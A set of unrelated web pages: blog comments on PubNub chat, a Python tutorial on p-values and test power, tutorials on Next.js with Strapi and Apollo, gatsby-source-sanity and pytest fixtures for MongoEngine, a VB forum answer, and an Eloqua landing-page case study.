@Ben, that's the error I get in Firefox. I believe it's because Firefox sees it as a "Plug-in" and not an object. I believe you will find you are running an older version of Chrome. With the new version of Chrome, on all of the computers I have tested, it has loaded. With the newer version of Opera I have gotten it to open some of the time; sometimes you will get the "Plug-in Missing" error, then you click refresh and it will load. Windows has a new online office just coming out, and the page loads in the new version of IE running on 7.
I have added a link to a PHP web site I wrote a few years back. It is below the client-to-client chat link. The whole web site embeds in the html5. It needs some explanation. The whole web site loads as cached objects or components when the first page loads. These objects are called to construct the rest of the pages of the web site from the client side. The text that appears is queried from the SQL database, filtered through an "includes PHP script", and spit out in html onto the page to be formatted by its CSS. Thus you have a web site that runs on little bandwidth overhead and spits out tweets, "like Twitter", which provide links to dynamic PDF-type objects. The dynamic PDF-type object would be capable of running its own client-side scripts. The dynamic PDF-type object would be like a chapter/short story for a third-grade reader, let's say. It would contain a vocabulary list with mouse-over pronunciations, a database of multiple-choice questions, and a system of scoring the achievement of the client. The dynamic PDF-type object would have to have the ability to work offline too. I just put this project on the back burner, because where was I going to find any programmers that were interested in creating any dynamic PDF-type objects?
When I wrote the swtchelp.com web site, it was to help students connect to campus resources over the slow 28kbps dialup connection that was available to local students. No one at the campus really cared about or understood the problem. As long as the campus could connect to local school systems, everything was fine. I wrote the swtchhelp.com web site to run over a satellite connection. A satellite connection has a slow ramp up; however, I designed my home page to appear in the middle of the ramp-up process, with functional navigation to the PDF object, which could be pulled down off the satellite at T1 speeds (1500 kbps).
In my vision, a barefoot nine-year-old boy in the third world begins his journey to a town with a satellite. He is carrying his village's Chrome Book type 3 pad with a second solid state hard drive for utilities and a copy of the OS, and a third solid state hard drive for cache manifest backup. After taking care of business, he connects to the satellite and looks at the world, and as he does, everything he sees is collected into the cache manifest to be carried back to his village. Lastly, he goes to an online school and caches dynamic PDF objects for lessons on how to read. Back at his village, under the yellow glow of a kerosene lamp, he and his friends peer into the wonder of the computer screen and the excitement they see in the world about them. Powered by an old car battery, charged through a solar panel in the day. It only takes time and a few pennies to help people help themselves and change the world about us.
@Henry,
Unfortunately, I know very little about PHP - I haven't programmed it in years. Sorry :(
@Allan,
Good sir, I love your vision! I felt good just reading it :)
I have successfully put your code on my PHP website; however, no matter what I type on the sender side, the message I receive only shows "object.object".
@Henry,
That probably means you're trying to use an object rather than a property of that object. Whatever that object is, try logging it to the Firebug console or something to see what it is.
It's not new exciting tech, it's been around for 10+ years now and many companies offer XMPP hosting, no server needed :)
@David,
I talk about things that are novel and exciting for *me*. On this blog, I almost never talk about when things were created and started to exist... unless to express remorse that I haven't heard about it until now.
And even still, just cause something was around for a while doesn't mean that it was necessarily very accessible to the public. Take phone integration, for example. Sure, you could make phone systems for a long time. BUT, it's only since Twilio where that has become an extremely low barrier to entry with extremely low pricing that has made previously existing technologies so accessible.
David, I found Ben's video refreshing and exciting. The only people who would be bemused and find the post novel would represent the position of the Baby Bells. They have been mitigating the problem for years. The funny part in all this is that it looks like they have painted themselves into a corner. David, I take it you haven't driven any of this "tech that has been around for 10 years" around the block.
The bottom line is: why should the Baby Bells be allowed to charge twice for the same service? They charge you for a block of data [5 GB for 50 bucks] on your smartphone/touchpad, then turn around and charge you for voice (which they now send you as data) against the data that has already been paid for.
I benefitted from your UUID approach to avoid this often unwanted behaviour with PubNub; but superfluous messages are still sent around...
- Channel naming: I know that BlazeDS can handle hierarchical names, and wildcarding! Any pointer to what is known about PubNub's approach?
hello sir,
i want to know how to get all history from a pubnub channel, and is there any way to set start and end parameters on the pubnub.history function.
please help me sir
https://www.bennadel.com/blog/2213-sending-client-to-client-realtime-messages-with-the-pubnub-javascript-library.htm
How do you decide if a change you made to your webpage is getting more customers to sign up? How do you know if the new drug you invented cures more people than the current market leader? Did you make a groundbreaking scientific discovery?
All these questions can be answered using a branch of statistics called hypothesis testing. This post explains the basics of hypothesis testing.
The first question everyone has is: did it work? How do you know if what you are seeing is due to chance or skill? To answer this you need to know: how often would you declare victory just because of random variations in your data sample? Luckily you can choose this number! This is what p-values do for you.
But before diving into more details let's set up a little toy experiment to work with and illustrate the different concepts.
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats

def two_samples(difference, N=6500, delta_variance=0.):
    As = np.random.normal(6., size=N)
    Bs = np.random.normal(6. + difference, scale=1 + delta_variance, size=N)
    return As, Bs
What does this look like then? We will create two samples with the same mean and 100 observations in each.
a = plt.axes()
As, Bs = two_samples(0., N=100)
_ = a.hist(As, bins=30, range=(2, 10), alpha=0.6)
_ = a.hist(Bs, bins=30, range=(2, 10), alpha=0.6)
print "Mean for sample A: %.3f and for sample B: %.3f" % (np.mean(As), np.mean(Bs))
Mean for sample A: 5.946 and for sample B: 6.093
You can see that the mean of neither of the two samples is exactly six, nor are the two values the same. Looking at the histogram of the two samples they do look kind of similar. If we did not know the truth about how these samples were made, would we conclude that they are different? If we did, would we be right?
This is where p-values and hypothesis testing come in. To do hypothesis testing you need two hypotheses which you can pit against each other. The first one is called the Null hypothesis or $H_0$ and the other one is often referred to as "alternate" or $H_1$. It is important to remember that hypothesis testing can only answer the following question: should I abandon $H_0$?
In order to get started with your hypothesis testing you need to assume that $H_0$ is true, so the test can never tell you whether or not this assumption is a good one to make. All it can do is tell you that there is overwhelming evidence against your null hypothesis. It also does not tell you whether $H_1$ is true or not.
The p-value is often used (and abused) to decide if a result is "statistically significant". The p-value is nothing more than the probability that you observed a result as extreme (far away from $H_0$) or more extreme than the one you did by chance alone assuming that $H_0$ is true.
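The definition above can be made concrete with a small permutation test using only the standard library (a sketch for illustration only; the post itself uses Student's t-test): we ask how often a random relabelling of the pooled data produces a difference in means at least as extreme as the one observed.

```python
import random

random.seed(42)

def one_sided_perm_pvalue(A, B, n_perm=2000):
    """Fraction of random relabellings of the pooled data whose
    difference in means is at least as extreme as the observed one."""
    observed = sum(B) / len(B) - sum(A) / len(A)
    pooled = list(A) + list(B)
    hits = 0
    for _ in range(n_perm):
        random.shuffle(pooled)
        pA, pB = pooled[:len(A)], pooled[len(A):]
        if sum(pB) / len(pB) - sum(pA) / len(pA) >= observed:
            hits += 1
    return hits / float(n_perm)

# Same underlying mean: the observed difference is easily produced by
# chance alone, so the p-value tends to be large.
A = [random.gauss(6, 1) for _ in range(100)]
B = [random.gauss(6, 1) for _ in range(100)]
p_same = one_sided_perm_pvalue(A, B)

# A big real difference: chance alone almost never reproduces it,
# so the p-value is tiny.
p_diff = one_sided_perm_pvalue(A, [a + 5 for a in A])
```

The exact numbers vary with the random seed, but the qualitative picture matches the t-test used below.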
Let's stick with the example of us wanting to know if our changes to our website improved the conversion rate or not. The p-value is the probability of the mean in the second sample being bigger than the mean in the first sample due to nothing else but chance. In this case you can calculate the p-value by using Student's t-test, which is implemented in
scipy, so let's use it (the helper below converts scipy's two-sided p-value into the one-sided one used throughout this post):

def one_sided_ttest(A, B):
    t, p = stats.ttest_ind(A, B, equal_var=True)
    # scipy returns a two-sided p-value; convert it to a one-sided one
    if t < 0:
        p /= 2.
    else:
        p = 1 - p/2.
    print "P-value: %.5f, the smaller the less likely it is that the means are the same"%(p)

one_sided_ttest(As, Bs)
P-value: 0.15576, the smaller the less likely it is that the means are the same
Common practice is to decide below which value the p-value has to be in order for this result to be statistically significant or not before looking at the data. By choosing a smaller value you are less likely to incorrectly conclude that your changes improved the conversion rate. Common choices are 0.05 or 0.01. Meaning you only make a mistake 1 in 20 or 1 in 100 times.
Let us repeat the experiment and look at another p-value:
As2, Bs2 = two_samples(0., N=100) one_sided_ttest(As2, Bs2)
P-value: 0.00285, the smaller the less likely it is that the means are the same
What happened here? The p-value is different! Not only is it different but it is also below 0.01, our changes worked! Actually we know that the two samples have the same mean, so how can this test be telling us that we found a statistically significant difference? This must be one of the cases where there is no difference but the p-value is small and we incorrectly conclude that there is a difference.
Let's repeat the experiment a few more times and keep track of all the p-values we see:
def repeat_experiment(repeats=10000, diff=0.):
    p_values = []
    for i in xrange(repeats):
        A, B = two_samples(diff, N=100)
        t, p = stats.ttest_ind(A, B, equal_var=True)
        if t < 0:
            p /= 2.
        else:
            p = 1 - p/2.
        p_values.append(p)
    plt.hist(p_values, range=(0, 1.), bins=20)
    plt.axvspan(0., 0.1, facecolor="red", alpha=0.5)

repeat_experiment()
The p-value depends on the outcome of your experiment, that is, on which particular values you observed. Therefore it is different every time you repeat the experiment. You can see that roughly 10% of all experiments ended up in the red shaded area; they have p-values below 0.1. These are the cases where you observe a significant difference in the means despite there being none. A false positive.
What happens if there is a difference between the means of the two samples?
repeat_experiment(diff=0.05)
Now you get a p-value less than 0.1 more often than 10% of the time. This is exactly what you would expect as the Null hypothesis is not true.
An important thing to realize is that by choosing your p-value threshold to be say 0.05, you are choosing to be wrong 1 in 20 times. Keep in mind: This is true if you judged a lot of copies of this experiment. For each individual experiment you do, you are either right or wrong. The trouble is you do not know which one of the two it is.
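A quick back-of-the-envelope calculation shows how fast those 1-in-20 mistakes accumulate when many copies of the experiment are judged (my own illustration, not from the post):

```python
def chance_of_any_false_positive(n, alpha=0.05):
    """Probability of at least one false positive among n independent
    experiments in which the null hypothesis is actually true every time."""
    return 1 - (1 - alpha) ** n

single = chance_of_any_false_positive(1)   # 0.05 by construction
twenty = chance_of_any_false_positive(20)  # ~0.64: more likely than not
```

So if you run twenty independent A/B tests on effects that do not exist, odds are you will still "discover" at least one of them.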
The smaller a value you choose for your p-value threshold, the smaller the chance of being wrong when you decide to switch to the new webpage. Nobody likes being wrong so why not always choose a very, very small threshold?
The price you pay for choosing a lower threshold is that you will end up missing out on opportunities to improve your conversion rate. By lowering the p-value threshold you will conclude that the new version did not improve things when it actually did.
def keep_or_not(improvement, threshold=0.05, N=100, repeats=1000):
    keep = 0
    for i in xrange(repeats):
        A, B = two_samples(improvement, N=N)
        t, p = stats.ttest_ind(A, B, equal_var=True)
        if t < 0:
            p /= 2.
        else:
            p = 1 - p/2.
        if p <= threshold:
            keep += 1
    return float(keep)/repeats

improvement = 0.05
thresholds = (0.01, 0.05, 0.1, 0.15, 0.2, 0.25)
for thresh in thresholds:
    kept = keep_or_not(improvement, thresh)*100
    plt.plot(thresh, kept, "bo")
plt.ylim((0, 45))
plt.xlim((0, thresholds[-1]*1.1))
plt.grid()
plt.xlabel("p-value threshold")
plt.ylabel("% cases correctly accepted")
<matplotlib.text.Text at 0x106ede550>
From this you can see that the times you accept the new webpage (which we know to be better by 5%) is smaller if you choose your p-value lower. Missing out on these opportunities is the price you pay for being wrong less often.
For a fixed p-value threshold, you correctly decide to change your webpage more often if the effect is larger:
improvements = np.linspace(0., 0.4, 9)
for improvement in improvements:
    kept = keep_or_not(improvement)*100
    plt.plot(improvement, kept, "bo")
plt.ylim((0, 100))
plt.xlim((0, improvements[-1]*1.1))
plt.grid()
plt.xlabel("Size of the improvement")
plt.ylabel("% cases correctly accepted")
plt.axhline(5)
<matplotlib.lines.Line2D at 0x10711b910>
This makes sense. If the difference between your two conversion rates is larger, then it should be easier to detect. As a result you correctly choose to change your webpage in a higher fraction of cases. In other words, the larger the difference, the more often you correctly reject the Null hypothesis.
The horizontal blue line marks the p-value threshold of 5%. You can see for the left most point at 0% improvement, we reject the Null hypothesis in 5% of cases and change our webpage. In reality the new webpage does no better than what we had before.
Similarly, the larger your p-value threshold the more often you correctly decide to reject the Null hypothesis. This comes at a price though, because the larger your p-value threshold, the higher the chance of you incorrectly deciding to change the website.
What we have called "% cases correctly accepted" is known in statistics as the power of a statistical test. The power of a test depends on the p-value threshold, the size of the effect you are looking for and the size of your sample.
For a given p-value threshold and improvement your chances of correctly detecting that there is an improvement depend on how many observations you have. If a change increases the conversion rate by a whopping 10% that is much easier to detect (you need to watch less people) than if a change only increases the conversion rate by 0.5%.
improvements = (0.005, 0.05, 0.1, 0.3)
markers = ("ro", "gv", "b^", "ms")
for improvement, marker in zip(improvements, markers):
    sample_size = np.linspace(10, 5000, 10)
    kept = [keep_or_not(improvement, N=size, repeats=10000)*100 for size in sample_size]
    plt.plot(sample_size, kept, marker, label="improvement=%g%%"%(improvement*100))
plt.legend(loc='best')
plt.ylim((0, 100))
plt.xlim((0, sample_size[-1]*1.1))
plt.grid()
plt.xlabel("Sample size")
plt.ylabel("% cases correctly accepted")
<matplotlib.text.Text at 0x10aed9190>
As you can see from this plot, for a given sample size you are more likely to correctly decide to switch to the new webpage for larger improvements. For increases in conversion rate of 10% or more you can see that you do not need a sample with more than 2000 observations or so to guarantee you will decide to switch if there is an effect. For very small improvements you see that you need very large samples to be sure to actually detect the small improvement.
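The same qualitative behaviour can be reproduced analytically with a normal approximation instead of simulation (a sketch of my own, using a one-sided two-sample z-test rather than the t-tests above, so the numbers are approximate):

```python
import math

def normal_cdf(x):
    # Standard normal CDF via the error function
    return 0.5 * (1 + math.erf(x / math.sqrt(2)))

def approx_power(improvement, N, alpha=0.05, sigma=1.0):
    """Approximate power of a one-sided two-sample z-test: the
    probability of rejecting H0 when the true difference in means
    is `improvement`, with N observations per group."""
    z_alpha = 1.6448536269514722  # 95th percentile of the standard normal
    se = sigma * math.sqrt(2.0 / N)  # std. error of the difference in means
    return 1 - normal_cdf(z_alpha - improvement / se)

no_effect = approx_power(0.0, 100)     # equals alpha: pure false-positive rate
small_N   = approx_power(0.1, 100)     # small sample, modest power
large_N   = approx_power(0.1, 2000)    # larger sample, much higher power
```

As in the simulated plots, power grows with both the effect size and the sample size, and collapses to the false-positive rate when there is no effect at all.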
Now you know about hypothesis testing, p-values and how to use them to decide if you should switch, and you know that p-values are not all there is. The power of your test, the probability to actually detect an improvement if it is there is just as important as p-values. The beauty is that you can calculate a lot of these numbers before you ever start running an A/B test or the likes.
This post started life as an IPython notebook; download it or view it online.
http://betatim.github.io/posts/when-to-switch/
In this tutorial, we'll learn how we can use Next.js with Strapi and Apollo.
Introduction
In one of my previous articles, I've written about how to get started using Strapi. In this post, we'll be building a newsfeed application using Next.js. The APIs necessary for the Next.js front-end application will be powered by Strapi. We'll also use Apollo as the GraphQL client.
The whole code for the application that we're going to build is available on Github.
Before we proceed, it's better if you have some idea about the following technologies:
I've been using Strapi for quite some time now and it's very easy to get up and running with it within a very short amount of time. It gives us a lot of features out of the box:
- Single types: Create one-off pages that have unique content structure
- Customizable API: With Strapi, you can just hop in your code editor and edit the code to fit your API to your needs.
- Integrations: Strapi supports integrations with Cloudinary, SendGrid, Algolia and others.
- Editor interface: The editor allows you to pull in dynamic blocks of content.
- Authentication: Secure and authorize access to your API with JWT or providers.
Next.js is a very popular React framework. It offers a lot of features like:
- TypeScript support: Automatic TypeScript configuration and compilation.
Apollo is the industry-standard GraphQL implementation, providing the data graph layer that connects modern apps to the cloud. It offers a lot of features like:
- Declarative data fetching: Write a query and receive data without manually tracking loading, error, or network states.
- Reactive data cache: Cut down on network traffic and keep data consistent throughout your application with Apollo Client’s normalized reactive data cache.
- Excellent dev experience: Enjoy cross stack type safety, runtime cache inspectors, and full featured editor integrations to keep you writing applications faster.
- Compatible and adoptable: Use any build setup and any GraphQL API. Drop Apollo Client into any app seamlessly without re-architecting your entire data strategy.
- Designed for modern UIs: Take advantage of modern UI architectures in the web, iOS, and Android ecosystems.
I've created a boilerplate so that you can get up and running with Strapi, Next.js and Apollo quickly. Check out the project on Github.
Creating a Strapi application using Docker
Step 1: Set up a new Strapi project with Docker. You can refer to this article for more details regarding how to install Strapi using Docker.
Step 2: We'll have to create our first administrator profile. Once our administrator profile is set up, we should be able to log into the admin panel of Strapi.
Step 3: We'll have to add a new content-type.
Step 4: Install the Strapi GraphQL plugin.
I've already covered most about getting started with Strapi. We're adding links to a previous article in order to keep this tutorial short.
Creating a Next.js application
We can create a new Next.js app using create-next-app, which sets up everything automatically for us:
yarn create next-app
The above command will install all the necessary packages as well as create a new directory based on the application name (which you entered during the setup process).
Integrating the Next.js application with Apollo
In order to integrate Apollo with Next.js, we need to add the required dependencies first:
yarn add @apollo/client graphql
Next, we need to create a new file
lib/with-graphql.js with the following content:
import { ApolloClient, ApolloProvider, InMemoryCache } from "@apollo/client";

const WithGraphQL = ({ children }) => {
  const client = new ApolloClient({
    uri: "", // the URL of your GraphQL endpoint goes here
    cache: new InMemoryCache(),
  });

  return <ApolloProvider client={client}>{children}</ApolloProvider>;
};

export default WithGraphQL;
Now, we can import this file and wrap any Next.js page where we want to use GraphQL:
import React from "react";
import Page from "components/pages/index";
import WithGraphQL from "lib/with-graphql";

const IndexPage = () => {
  return (
    <WithGraphQL>
      <Page />
    </WithGraphQL>
  );
};

export default IndexPage;
Now, we can use GraphQL queries and mutations in the
components/pages/index.js file:
import { gql, useQuery } from "@apollo/client";
import { Box, Stack } from "@chakra-ui/core";
import Feed from "components/pages/index/feed";
import React from "react";

const feedsQuery = gql`
  query fetchFeeds {
    feeds {
      id
      created_at
      body
      author {
        id
        username
      }
    }
  }
`;

const FeedsPageComponent = () => {
  const { loading, error, data } = useQuery(feedsQuery);

  if (loading) return <p>Loading...</p>;
  if (error) return <p>Error :(</p>;

  return (
    <Stack spacing={8}>
      {data.feeds.map(feed => {
        return (
          <Box key={feed.id}>
            <Feed feed={feed} />
          </Box>
        );
      })}
    </Stack>
  );
};

export default FeedsPageComponent;
Conclusion
In this tutorial, we've learnt how we can integrate Apollo with Next.js and use it with Strapi. I've created a boilerplate so that you can get up and running with Strapi, Next.js and Apollo quickly. Check out the project on Github. Documentation of this project is available here.
https://nirmalyaghosh.com/articles/js-strapi-apollo
I'm trying to create an inherited user control (not sure whether this is the right term). I have created a class Button (button.vb; there is no button.designer.vb) in a project with the following code:
Public Class Button
    Inherits System.Windows.Forms.Button
End Class
After I build the project, I have no problem adding it to the toolbar and using it in another solution.
When I look at other user controls, I see there is a line Imports System.ComponentModel. I want to know the effect of adding that line to my code:
Imports System.ComponentModel
Public Class Button
Inherits System.Windows.Forms.Button
An Imports directive just lets you use types from that namespace without fully qualifying the name. For example you can write just BindingList instead of System.ComponentModel.BindingList.
Imports directives don't change the compiled code in any way.
https://social.msdn.microsoft.com/Forums/en-US/aa55d929-c796-4b52-a7d9-732362c7860c/what-is-the-purpose-of-the-line-imports-systemcomponenetmodel?forum=vblanguage
- Real-time content preview with watch mode
- GraphQL API
- Using images
- Generating pages
- “Raw” fields
- Portable Text / Block Content
- Using .env variables
- How this plugin works
- Credits
See the getting started video
Install
From the command line, use npm (node package manager) to install the plugin:
npm install gatsby-source-sanity
Then explore the generated GraphQL API in the GraphiQL interface after running
gatsby develop to understand the created data: create a new query and check the available collections and fields by typing
CTRL + SPACE.
Options
Preview of unpublished content
Sometimes you might be working on some new content that is not yet published, which you want to make sure looks alright within your Gatsby site. By setting the
overlayDrafts setting to
true, the draft versions will, as the option says, “overlay” the regular document. In terms of Gatsby nodes, it will replace the published document with the draft.
Keep in mind that drafts do not have to conform to any validation rules, so your frontend will usually want to double-check all nested properties before attempting to use them.
Real-time content preview with watch mode
While developing, it can often be beneficial to get updates without having to manually restart the build process. By setting
watchMode to true, this plugin will set up a listener which watches for changes. When it detects a change, the document in question is updated in real-time and will be reflected immediately.
If you add a
token with read rights and set
overlayDrafts to true, each small change to the draft will immediately be applied.
Using images
Image fields will have the image URL available under the
field.asset.url key, but you can also use gatsby-image for a smooth experience. It’s a React component that enables responsive images and advanced image loading techniques. It works great with this source plugin, without requiring any additional build steps.
There are two types of responsive images supported; fixed and fluid. To decide between the two, ask yourself: “do I know the exact size this image will be?” If yes, you’ll want to use fixed. If no and its width and/or height need to vary depending on the size of the screen, then you’ll want to use fluid.
Fluid
import React from 'react' import Img from 'gatsby-image' const Person = ({data}) => ( <article> <h2>{data.sanityPerson.name}</h2> <Img fluid={data.sanityPerson.profileImage.asset.fluid} /> </article> ) export default Person export const query = graphql` query PersonQuery { sanityPerson { name profileImage { asset { fluid(maxWidth: 700) { ...GatsbySanityImageFluid } } } } } `
Fixed
import React from 'react' import Img from 'gatsby-image' const Person = ({data}) => ( <article> <h2>{data.sanityPerson.name}</h2> <Img fixed={data.sanityPerson.profileImage.asset.fixed} /> </article> ) export default Person export const query = graphql` query PersonQuery { sanityPerson { name profileImage { asset { fixed(width: 400) { ...GatsbySanityImageFixed } } } } } `
Available fragments
These are the fragments available on image assets, which allows easy lookup of the fields required by gatsby-image in various modes:
GatsbySanityImageFixed
GatsbySanityImageFixed_noBase64
GatsbySanityImageFluid
GatsbySanityImageFluid_noBase64
Usage outside of GraphQL
If you are using the raw fields, or simply have an image asset ID you would like to use gatsby-image for, you can import and call the utility functions
getFluidGatsbyImage and
getFixedGatsbyImage:
import Img from 'gatsby-image'
import {getFluidGatsbyImage, getFixedGatsbyImage} from 'gatsby-source-sanity'

const fluidProps = getFluidGatsbyImage(imageAssetId, {maxWidth: 1024}, sanityConfig)

<Img fluid={fluidProps} />
Generating pages
Sanity does not have any concept of a “page”, since it’s built to be totally agnostic to how you want to present your content and in which medium, but since you’re using Gatsby, you’ll probably want some pages!
As with any Gatsby site, you’ll want to create a
gatsby-node.js in the root of your Gatsby site repository (if it doesn’t already exist), and declare a
createPages function. Within it, you’ll use GraphQL to query for the data you need to build the pages.
For instance, if you have a
project document type in Sanity that you want to generate pages for, you could do something along the lines of this (a sketch; adjust the query and field names to your own schema):

exports.createPages = async ({graphql, actions}) => {
  const {data} = await graphql(`
    {
      allSanityProject(filter: {slug: {current: {ne: null}}}) {
        edges {
          node {
            slug {
              current
            }
          }
        }
      }
    }
  `)

  data.allSanityProject.edges.forEach(({node}) => {
    actions.createPage({
      path: `/project/${node.slug.current}`,
      component: require.resolve('./src/templates/project.js'),
      context: {slug: node.slug.current},
    })
  })
}
The above query will fetch all projects that have a
slug.current field set, and generate pages for them, available as
/project/<project-slug>. It will use the template defined in
src/templates/project.js as the basis for these pages.
Most Gatsby starters have some example of building pages, which you should be able to modify to your needs.
Remember to use the GraphiQL interface to help write the queries you need - it's usually available locally while running
gatsby develop.
“Raw” fields
Arrays and object types at the root of documents will get an additional “raw JSON” representation in a field called
_raw<FieldName>. For instance, a field named
body will be mapped to
_rawBody. It’s important to note that this is only done for top-level nodes (documents).
Portable Text / Block Content
Rich text in Sanity is usually represented as Portable Text (previously known as “Block Content”).
These data structures can be deep and a chore to query (specifying all the possible fields). As noted above, there is a “raw” alternative available for these fields which is usually what you’ll want to use.
You can install block-content-to-react from npm and use it in your Gatsby project to serialize Portable Text. It lets you use your own React components to override defaults and render custom content types. Learn more about Portable Text in our documentation.
https://www.gatsbyjs.com/plugins/gatsby-source-sanity
Django + Mongo = Pytest FTW! A clean way to manage connecting and dropping of database between tests.
Some time ago I started working on my own playground project where I'm mostly trying to learn new things, but I also hope to create something useful from it that's in my field of interest. I figured it might be a good project for learning how to integrate Django with a Mongo database, which I plan to use for some of the models.
Incorporating a new technology into your stack is never easy - in this case, besides learning a new way to model the data, I also had to find a good ORM, come up with proper provisioning for my Vagrant box and TravisCI, and finally figure out how to do testing in this new environment.
In my project I'm using MongoEngine as an ORM, which is pretty similar to Django's ORM, well maintained, more or less easy to set up, and supported by many other plugins and libraries. I also use Pytest. Let's look at the most basic way to set up this environment for tests:
### FILE: testing_settings.py
import mongoengine
from .settings import *
# [...] some settings overrides
mongoengine.connection.disconnect() # disconnect main db first
In my main
settings.py file I'm connecting to the real Mongo database; the above file is run only by Pytest, so first I'm disconnecting. This looks the same in every other variant that I will write about later. After that we need to connect to our testing database, so still in
testing_settings.py:
connect('testdb', host='mongodb://localhost')
From now on every call made by MongoEngine will be made to this database. However, if you are used to Django testing, you probably want a clean database in each test case. We can achieve this by calling the
drop_database() method on the DB instance returned by
connect(), so one way to connect and drop on each test is to use Pytest's so-called xUnit-style
setup_method and
teardown_method:
import mongoengine as me
from ..models import Site

class SiteTests:
    def setup_method(self):
        self.db = me.connect(
            'testdb',
            host='mongodb://localhost'
        )

    def teardown_method(self):
        self.db.drop_database('testdb')
        self.db.close()

    def test_object_creation(self):
        site = Site(name='test_site')
        site.save()
        assert Site.objects.first().name == site.name
So in our setup method we are connecting to a testing database, and that database is then bound to an attribute so it can be easily dropped and the connection closed on the teardown. Test is passing, and everything is ok, but…
I usually write my tests in several files, most often these are
test_models.py, test_forms.py and test_views.py. In these files there are usually several classes; when you multiply that by many apps it becomes obvious that you would need that setup and teardown many times… Let's come up with a better way of doing it (besides OOP methods).
Pytest fixtures for the rescue! Pytest assertions are very clean, there are plenty of configuration options, but fixtures feature is the biggest deal - if you still aren’t using them, then you definitely are missing a fantastic tool. Let’s look how we can use them in this case:
### FILE: fixtures.py
import pytest
import mongoengine as me

@pytest.fixture(scope='function')
def mongo(request):
    db = me.connect('testdb', host='mongodb://localhost')
    yield db
    db.drop_database('testdb')
    db.close()
I usually create this file in
utils or
common directory, so I can import it wherever I need it. This fixture connects to the database and yields it; after its scope finishes, the database is dropped and the connection closed. I set the scope to
function explicitly, but it’s a default value. If I set it to
module then all tests within a single module would use the same database. Fixture is used like a dependency injection:
from utils.fixtures import mongo
from ..models import Site

class SiteTests:
    def test_object_creation(self, mongo):  # use the fixture
        site = Site(name='test_site')
        site.save()
        assert Site.objects.first().name == site.name

    def test_object_creation2(self, mongo):  # use the fixture
        site = Site(name='test_site2')
        site.save()
        assert Site.objects.first().name == site.name
Both tests pass. In the same way we can import this fixture into other modules, and everything will work. If I needed the database to persist across a couple of tests, I could create another, almost identical fixture with its scope set to, for example,
class. Prior to Pytest 2.10 creating fixtures with teardowns (dropping the db in our case) was a bit more complicated, but now using
yield is pretty neat, I love it!
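Under the hood a yield-style fixture is just a generator: pytest runs it up to the yield for setup, hands the yielded value to the test, and then exhausts the generator for teardown. A minimal stdlib-only illustration of that mechanism (no pytest involved, and the "database handle" here is just a placeholder string):

```python
events = []

def mongo_fixture():
    events.append("connect")        # setup phase (before the yield)
    yield "fake-db-handle"          # the value injected into the test
    events.append("drop + close")   # teardown phase (after the yield)

gen = mongo_fixture()
db = next(gen)                      # pytest does this before the test runs
assert db == "fake-db-handle"

try:
    next(gen)                       # ...and this after the test finishes
except StopIteration:
    pass                            # generator exhausted: teardown has run

assert events == ["connect", "drop + close"]
```

This is why the code after the yield is guaranteed to run once the fixture's scope ends, which is exactly what we rely on to drop the test database.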
So we still have to inject the fixture as an argument into each test, which is quite a lot of writing, so… can it get any better? It actually can :)
import pytest

from utils.fixtures import mongo
from ..models import Site

@pytest.mark.usefixtures('mongo')
class SiteTests:
    def test_object_creation(self):
        site = Site(name='test_site')
        site.save()
        assert Site.objects.first().name == site.name
By decorating the class, Pytest automatically uses the given fixtures in each method. Keep in mind that in the decorator the fixture must be given as a string (yet it still needs to be imported); otherwise the tests in this class won't run, with no warnings, so watch out for that.
MongoEngine’s documentation suggests using Mongomock in tests, which is built around excellent Mock module from the Python standard library. To use it - after it’s installation - just change the connection URI like this:
# mongodb => mongomock
db = me.connect('testdb', host='mongomock://localhost')
And that's it! Since it's not a real database, tests are faster and we no longer need Mongo itself installed (which might matter for some CI tools), yet everything works fine - at least when test cases aren't too complicated. This is just a mock, and not every Mongo feature is implemented, but that issue can easily be managed with fixtures: just create one fixture for the "real" db and one for the mock, then decorate your classes accordingly.
That's not all: I haven't mentioned yet that fixtures are modular, which means that you can build a couple of them into one, and that they can also take parameters, but I will write more about that some other time; meanwhile I suggest going through the docs.
I hope this was helpful, cheers.
https://medium.com/@antash/django-mongo-pytest-ftw-1610c99588ab
When I think of Eloqua, I think of marketing automation. More specifically, I think of the ability to automate complex e-mail nurturing campaigns. For my thought leadership post as part of the Luminary pathway, I want to share my experience using Eloqua for something that the average person doesn’t associate with Eloqua – landing pages.
At Pearson VUE, I help our IT clients market and sell their certification products. I was recently challenged to help a client increase the number of certifications coming from high school and college students.
We designed a campaign to influence students by communicating our message through parents of high school students and guidance counselors. Our goal was to raise awareness of the ability to receive college credit for completing specific IT certifications. We would evaluate the success of the campaign based on several factors, including the number of academic exams delivered, number of visitors to the student landing page, and the engagement level of visitors to the web site.
We selected a media partner to promote the global campaign online and utilized a programmatic advertising platform to perform advanced targeting through machine learning. To enable the advertising tracking and remarketing, we needed to integrate several technologies into our landing pages.
When we sat down with our internal development team, Eloqua was not the immediate solution brought to the table. There were other landing page tools our team had more experience with. However, the 80+ hours of Eloqua training I had consumed during the last year led me to recommend Eloqua.
Eloqua offered a few key advantages. First of all, the ability to create landing pages on-the-fly was available with Eloqua at no additional charge. The other tools we looked at charged additional fees based on landing page traffic. Eloqua also offered the only all-in-one solution. Not only could we use Eloqua for two critical landing pages, but we could also use Eloqua to automate and route the form responses we received from our campaign. We were also able to leverage Eloqua’s reporting and analytics capabilities.
Eloqua allowed us to focus on the design and content of the landing pages, as we didn’t have to write a lot of custom code. For example, one of the landing pages we created included a form for guidance counselors to request a packet of materials for their classroom. We used the standard features of Eloqua forms to make all of the form fields required, saving us from having to write or implement JavaScript code. Once the form was submitted, one e-mail was sent to our internal team to notify us of a new submission and another was sent to the requester of the information. A personalized e-mail was automatically sent informing them that they would be receiving a package in the mail shortly. We also displayed a thank-you page after they submitted the form. The thank-you page would redirect to a new page with additional certification resources after one minute. The redirect was simple to set up in Eloqua.
To track the effectiveness of our marketing efforts and allow us to remarket to landing page visitors, we implemented cookies, pixel tracking, analytics code and onclick event handlers. Although this didn’t directly require anything specific from Eloqua, it was great to know that Eloqua’s hosting capabilities were able to accommodate custom HTML code.
It’s hard to single out the specific Eloqua courses that provided me with the knowledge to strategize this type of campaign in Eloqua. It was really the combination of the 25+ classes I attended during the last year that provided the background I needed. If I were to name a few key courses, I’d have to mention Fundamentals of Forms and Landing Pages, Advanced Editing and Form Processing, and Fundamentals of Emails.
